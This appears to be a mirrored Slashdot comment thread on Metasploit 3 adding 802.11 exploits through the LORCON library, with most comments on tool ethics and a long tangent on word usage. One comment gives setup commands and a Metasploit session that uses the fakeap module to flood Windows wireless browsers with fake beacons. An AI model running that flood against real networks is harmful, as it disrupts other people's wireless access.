Slashdot Mirror
Wi-Fi Exploits Coming to Metasploit
bucksDrop writes "Eweek.com is reporting that the Metasploit Project will add 802.11 (Wi-Fi) exploits to a new version of its point-and-click attack tool. Metasploit 3 will integrate kernel-mode payloads to allow users to use existing user-mode payloads for both kernel and non-kernel exploits. Metasploit is collaborating with Jon 'Johnny Cache' Ellch and implementing it by wrapping the LORCON library."
No really, I appreciate all the work that goes into putting this together. I'm sure privately distributed cracking tools already have some of this functionality. Maybe this will get OS vendors to pay a little more attention to wireless security. Wireless is not likely to be widely exploited mechanism for a worm, but it is still something that needs more attention.
W=10.1
F=9.8
i=2673.7
What is Wi-Fi?
Do I wrap my laptop in tinfoil yet, or not?
= Grow a brain...
Why don't hardware vendors simply release the source to their drivers so problems like this can be squashed quickly? Of course, there is no guarantee that the white hats will find problems before the black hats do, but it exposes flaws more eyeballs.
...that I speak for a lot of people, based on the low response to this particular gem of posting, when i say:
*blinkblink*
WTF, mate?
Come read my stupid blagablog. Rants and Giggles
I've played around with metasploit in the past, especially their VNC payloads. The tool seems to have a high likelihood of abuse, compared to a lot of the other security tools (starting from nmap,nessus and all). Except for a couple of courtesy terminals, the tool basically gets you in and gives you a general feeling of being in control.
Canned scripts hardly ever teach you anything, especially when they work out of the box. Making them writing your own exploits is the easiest way to get a script kiddie to learn a bit and grow up (sort of).
Quidquid latine dictum sit, altum videtur
Install the latest Lorcon snapshot:
:-)
$ http://www.802.11mercenary.net/lorcon/
Grab the latest version of metasploit 3:
$ svn co http://metasploit.com/svn/framework3/trunk/
Compile the Metasploit Lorcon wrapper:
$ cd trunk/external/msflorcon
$ make
Plug in a support network card (I use a WPN511 with the madwifi-old driver in Gentoo)
Load the Metasploit Console (as root, since it needs raw WiFi access)
# trunk/msfconsole
Play with some of the demo modules
This is an example of sending fake beacon requests to flood the Windows Wireless Network Browser:
msf > use auxiliary/dos/wireless/fakeap
msf auxiliary(fakeap) > show options
Module options:
CHANNEL 11 yes The default channel number
DRIVER madwifi yes The name of the wireless driver for lorcon
INTERFACE ath0 yes The name of the wireless interface
Type the "run" command, or use "set VARIABLE VALUE" to change these options.
msf auxiliary(fakeap) >run
So I guess "loose" and "lose" are now synonymous..
I just really don't agree. I'm not the kind who generally goes off on people for misusing words as long as I can understand what they're trying to say, but at the same time, words have meanings. The fact that people have no idea how to properly use those words should not change what the words mean. It should just make us exceptionally sad at the state of affairs our communications skills are in.
Incidentally, this is coming from somebody who misused the phrase "begs the question" dozens of times in his life. The difference being, when it was pointed out to me (I forget if somebody said something or I just came across the correct usage one day), I actually made a mental note of it and I have used it properly since then. It wasn't hard. Neither, as my little joke intimated, is using "lose" and "loose" properly. It just takes a little conscious effort at first, and then it will become second nature.
Personally I think we should be getting people to do that rather than pandering to them and altering the meaning of words and phrases once we reach some ignorance threshold.
Hopefully now that the code is out there, someone independent (not Ellch and not a Mac blogger) will test this exploit on an out-of-the-box MacBook, and see if the hole lives up to the hype.
0 1 - just my two bits
This is how enormity got to mean "something really big" instead of "a crime beyond all moral boundaries".
Language defined by misuse. Usually done by lackwits in a misguided attempt to sound sophisticated, but ironically it demonstrates instead only their lack of language skills.
These things grate like fingernails on the chalkboard of my soul. Mostly they make me very sad.
None of them can see the clouds; The polished wings don't care.
I am very much in agreement. If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing. If I said "That begs the question" 75 years ago, most people would realize that I was calling out the speaker for using a circular argument. Saying "That begs the question" today evokes responses like "What question?" The meaning is nearly lost. We have hundreds of thousands of simple words and phrases that we use to convey much more complex concepts. If we let our language become eroded by the uneducated masses, how will we become educated? We will waste all of our time explaining our ideas in excruciating detail rather than using the previously ubiquitous simplified words and phrases that were crafted to symbolize those very concepts.
Don't use words and phrases for which you haven't learned the meanings!
That depends on what your definition of "is" is. Heh...just kidding.
If the masses are allowed to dictate whatever meaning they choose for words or phrases they hear, they will slowly erode the vast variety of meanings that can be conveyed through speech and writing
It's not a matter of choice. Languages change over time - they always have and always will. You can argue that this is a bad thing, and you might even be right - but I guarantee you can't stop it.
If you don't like it - tough! Suck it up and stop whining.
I recently removed a nasty trojan (a member of the 'Wareout' family) from my laptop, with the aid of the free Sophos Anti-Rootkit and fantastic free technical support from the great folks at the spybot forums. My best guess was that I got the infection when I logged into a free wifi connection at a local cafe. I saw a brief message from my antivirus software that a trojan had been detected, but afterwards, it reported nothing. After reading the eweek article, I learned that my Intel Pro/Wireless driver had major security vulnerabilities. I just downloaded the update and hopefully will be malware-free for a little while. So much precious time development time was wasted because of this infection!
Building a better ribosome since 1997
Proof of concept exploits, are one thing, arguably useful. But helpfully integrating them into a tool script kiddies can use is just wrong. This is the kind of thing that makes computer security an ongoing nightmare.
For every expert, there is an equal and opposite expert. - Arthur C. Clarke
Anyways, I could care less about you're opinion your retarted!
p.s did you get them legos for cheap?
(Oh thank god FF2.0 marks "legos" as a spelling mistake and incase you missed it, I thoroughly agree with your post)
The origins of pandering: Your argument is that simply because his use of the phrase does not conform to it's traditional use it is not valid. My response to you is that if linguistic constructions were never allowed to take on new meaning, you would never have thought to use pandering as it traditionally denoted something other than 'to appeal to'.
IMO, this is not the way to go about using language. Truthfully, if one intended to denote circular reasoning there are much more obvious ways to do this. Actually saying 'circular reasoning' would for example be more concise.